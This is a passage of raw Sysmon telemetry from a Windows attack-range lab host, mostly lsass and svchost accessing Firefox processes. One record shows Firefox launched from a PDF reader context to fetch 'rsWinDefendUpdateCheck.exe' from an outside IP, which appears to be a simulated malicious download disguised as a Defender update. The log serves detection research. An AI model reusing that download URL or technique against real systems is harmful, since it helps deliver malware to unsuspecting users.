Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.747{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.1.756082650\168713744" -parentBuildID 20230112150232 -prefsHandle 1712 -prefMapHandle 1708 -prefsLen 25905 -prefMapSize 234522 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0abee0ec-01cd-4acd-8921-9c3514fe5a73} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 1720 1d964682358 socketC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 